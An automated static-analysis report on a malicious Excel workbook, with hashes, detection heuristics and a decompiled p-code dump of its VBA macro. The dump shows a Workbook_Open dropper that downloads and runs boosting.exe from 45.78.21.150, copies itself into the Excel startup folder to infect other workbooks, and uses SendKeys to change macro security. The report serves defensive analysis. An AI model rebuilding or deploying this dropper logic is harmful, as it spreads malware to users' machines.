Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 b1bb2e224793501f…

MALICIOUS

Office (OLE) / .XLS

Size: 47.0 KB
Created: 2019-12-18 01:30:09
Authoring application: WPS Office
First seen: 2026-06-06
MD5: 4bca5ca2e4fe776d76cc917a62f0ee87
SHA-1: 52eb07f8c0718be483e13c2e24dcf1e0b8d94a42
SHA-256: b1bb2e224793501f9159a23cb869439e55cd462dda92dd6a2614777c5f2cdee6
Risk score: 224

Heuristics (7)

  • Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD)
  • Reference to ShellExecute API (high, SC_STR_SHELLEXEC)
  • Reference to Windows Script Host (high, SC_STR_WSCRIPT)
  • LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND)
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA project contains no executable statements (info, 1 related finding, OLE_VBA_MACROS)
    Document contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs and the channel that reached each:
    • http://45.78.21.150/boost/boosting.exe  [In document text (OLE body)]
    • http://45.78.21.150/boost/config.txt  [In document text (OLE body)]
    • http://45.78.21.150/boost/boo  [In macro / runtime command snippet]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12356 bytes
SHA-256: 67cf82023f4f1a3d6481e4d6c7cbb7c31bdb655cae2093d6801f530bf2352c22
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/354cda915e9848ffbf1f3d929637e5ea.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 8233 bytes
' Line #0:
' 	FuncDefn (Private Declare Function URLDownloadToFile Lib "urlmon" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long)
' Line #1:
' 	FuncDefn (Private Declare Function ShellExecute Lib "shell32.dll" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long)
' Line #2:
' 	Dim (Private) 
' 	VarDefn (WithEvents) app (As Application) 0x0000
' Line #3:
' Line #4:
' 	FuncDefn (Sub boosting())
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #6:
' 	OnError (Resume Next) 
' Line #7:
' 	SetStmt 
' 	LitStr 0x000D "Win32_Process"
' 	LitStr 0x000C "winmgmts:\\."
' 	ArgsLd GetObject 0x0001 
' 	ArgsMemLd instancesof 0x0001 
' 	Set pro 
' Line #8:
' 	LitDI2 0x0000 
' 	St boo 
' Line #9:
' 	StartForVariable 
' 	Ld ps 
' 	EndForVariable 
' 	Ld pro 
' 	ForEach 
' Line #10:
' 	Ld ps 
' 	MemLd Name 
' 	LitStr 0x000C "boosting.exe"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St boo 
' 	EndIf 
' Line #11:
' 	StartForVariable 
' 	Next 
' Line #12:
' 	Ld boo 
' 	LitDI2 0x0001 
' 	Eq 
' 	IfBlock 
' Line #13:
' 	ExitSub 
' Line #14:
' 	ElseBlock 
' Line #15:
' 	LitStr 0x0015 "ping www.163.com -n 1"
' 	LitDI2 0x0000 
' 	LitVarSpecial (True)
' 	LitStr 0x000D "Wscript.shell"
' 	ArgsLd CreateObject 0x0001 
' 	ArgsMemLd Run 0x0003 
' 	St oExec 
' Line #16:
' 	Ld oExec 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #17:
' 	LitDI2 0x0000 
' 	LitStr 0x0026 "http://45.78.21.150/boost/boosting.exe"
' 	LitStr 0x0017 "C:\Windows\boosting.exe"
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall URLDownloadToFile 0x0005 
' Line #18:
' 	LitDI2 0x0000 
' 	LitStr 0x0024 "http://45.78.21.150/boost/config.txt"
' 	LitStr 0x0015 "C:\Windows\config.txt"
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall URLDownloadToFile 0x0005 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	LitDI4 0x0000 0x0000 
' 	Ld vbNullString 
' 	LitStr 0x0017 "C:\Windows\boosting.exe"
' 	LitStr 0x0015 "C:\Windows\config.txt"
' 	Ld vbNullString 
' 	LitDI2 0x0000 
' 	ArgsCall ShellExecute 0x0006 
' Line #21:
' 	EndIfBlock 
' Line #22:
' 	EndSub 
' Line #23:
' 	FuncDefn (Sub runtimer())
' Line #24:
' 	Ld Now 
' 	LitStr 0x0008 "00:00:03"
' 	ArgsLd TimeValue 0x0001 
' 	Add 
' 	LitStr 0x0011 "thisworkbook.p2dd"
' 	Ld Application 
' 	ArgsMemCall OnTime 0x0002 
' Line #25:
' 	EndSub 
' Line #26:
' Line #27:
' 	FuncDefn (Private Sub p2dd())
' Line #28:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #29:
' 	OnError (Resume Next) 
' Line #30:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	PrintItemNL 
' Line #31:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI2 0x03EC 
' 	Eq 
' 	IfBlock 
' Line #32:
' 	Ld Err 
' 	ArgsMemCall Clear 0x0000 
' Line #33:
' 	LitStr 0x0010 "%(qtmstv){ENTER}"
' 	Ld Application 
' 	ArgsMemCall SendKeys 0x0001 
' Line #34:
' 	ArgsCall DoEvents 0x0000 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	Ld ActiveWorkbook 
' 	MemLd FileFormat 
' 	LitDI2 0x0034 
' 	Eq 
' 	Ld ActiveWorkbook 
' 	MemLd FileFormat 
' 	LitDI2 0x0038 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #37:
' 	LitStr 0x0006 "update"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x000A 
' 	LitDI2 0x0001 
' 	LitVarSpecial (False)
' 	LitVarSpecial (False)
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0007 
' 	LitVarSpecial (True)
' 	Eq 
' 	LitStr 0x000B "OfficeCheck"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x000A 
' 	LitDI2 0x0001 
' 	LitVarSpecial (False)
' 	LitVarSpecial (False)
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0007 
' 	LitVarSpecial (True)
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #38:
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St k 
' Line #39:
' 	LitDI2 0x0001 
' 	Ld k 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #40:
' 	EndIfBlock 
' Line #41:
' 	Dim 
' 	VarDefn WBstr
' 	VarDefn Wb (As Workbook)
' Line #42:
' 	StartWithExpr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #43:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' 	QuoteRem 0x0019 0x000D ".CountOfLines"
' Line #44:
' 	Ld WBstr 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	Concat 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St WBstr 
' Line #45:
' 	StartForVariable 
' 	Next 
' Line #46:
' 	EndWith 
' Line #47:
' Line #48:
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #49:
' 	LitDI2 0x0001 
' 	Ld WBstr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #50:
' 	LitDI2 0x0096 
' 	LitStr 0x0013 "Sub Workbook_Open()"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #51:
' 	LitDI2 0x0097 
' 	LitStr 0x0008 "Call d2p"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #52:
' 	LitDI2 0x0098 
' 	LitStr 0x000D "Call boosting"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #53:
' 	LitDI2 0x0099 
' 	LitStr 0x0007 "End Sub"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #54:
' 	EndIfBlock 
' Line #55:
' 	EndIfBlock 
' Line #56:
' 	EndSub 
' Line #57:
' Line #58:
' 	FuncDefn (Private Sub d2p())
' Line #59:
' 	Dim 
' 	VarDefn pth (As String)
' Line #60:
' 	Dim 
' 	VarDefn WBstr
' 	VarDefn Wb (As Workbook)
' Line #61:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #62:
' 	OnError (Resume Next) 
' Line #63:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x000D "\boosting.xls"
' 	Concat 
' 	St pth1 
' Line #64:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	PrintItemNL 
' Line #65:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI2 0x03EC 
' 	Eq 
' 	IfBlock 
' Line #66:
' 	Ld Err 
' 	ArgsMemCall Clear 0x0000 
' Line #67:
' 	LitStr 0x0010 "%(qtmstv){ENTER}"
' 	Ld Application 
' 	ArgsMemCall SendKeys 0x0001 
' Line #68:
' 	ArgsCall DoEvents 0x0000 
' Line #69:
' 	EndIfBlock 
' Line #70:
' 	Ld pth1 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #71:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	PrintItemNL 
' Line #72:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI2 0x03EC 
' 	Ne 
' 	IfBlock 
' Line #73:
' 	Ld pth1 
' 	ParamNamed Filename 
' 	LitDI2 0x0012 
' 	ParamNamed FileFormat 
' 	Ld Workbooks 
' 	MemLd Add 
' 	ArgsMemCall SaveAs 0x0002 
' Line #74:
' 	QuoteRem 0x0000 0x0004 "Else"
' Line #75:
' 	QuoteRem 0x0004 0x000F "Workbooks.Close"
' Line #76:
' 	EndIfBlock 
' Line #77:
' 	SetStmt 
' 	Ld pth1 
' 	Ld Workbooks 
' 	ArgsMemLd Open 0x0001 
' 	Set Wb 
' Line #78:
' 	StartWithExpr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #79:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' 	QuoteRem 0x0019 0x0011 ".CountOfLines 100"
' Line #80:
' 	Ld WBstr 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	Concat 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St WBstr 
' Line #81:
' 	StartForVariable 
' 	Next 
' Line #82:
' 	EndWith 
' Line #83:
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Eq 
' 	Ld ActiveWorkbook 
' 	MemLd Name 
' 	LitStr 0x000C "boosting.xls"
' 	Eq 
' 	And 
' 	IfBlock 
' Line #84:
' 	LitDI2 0x0001 
' 	Ld WBstr 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #85:
' 	LitDI2 0x0096 
' 	LitStr 0x0013 "Sub Workbook_Open()"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #86:
' 	LitDI2 0x0097 
' 	LitStr 0x0015 "Set App = Application"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #87:
' 	LitDI2 0x0098 
' 	LitStr 0x0007 "End Sub"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #88:
' 	LitDI2 0x0099 
' 	LitStr 0x0032 "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #89:
' 	LitDI2 0x009A 
' 	LitStr 0x000D "Call runtimer"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #90:
' 	LitDI2 0x009B 
' 	LitStr 0x000D "Call boosting"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #91:
' 	LitDI2 0x009C 
' 	LitStr 0x0007 "End Sub"
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #92:
' 	EndIfBlock 
' Line #93:
' 	LitVarSpecial (True)
' 	Ld ActiveWorkbook 
' 	MemSt IsAddin 
' Line #94:
' 	Ld Wb 
' 	ArgsMemCall Save 0x0000 
' Line #95:
' 	Ld Wb 
' 	ArgsMemCall Close 0x0000 
' Line #96:
' 	EndIfBlock 
' Line #97:
' 	Ld pth1 
' 	Paren 
' 	Ld Workbooks 
' 	ArgsMemCall Open 0x0001 
' Line #98:
' 	EndSub 
' Line #99:
' Line #100:
' Line #101:
' 	FuncDefn (Sub Workbook_Open())
' Line #102:
' 	ArgsCall (Call) d2p 0x0000 
' Line #103:
' 	ArgsCall (Call) boosting 0x0000 
' Line #104:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes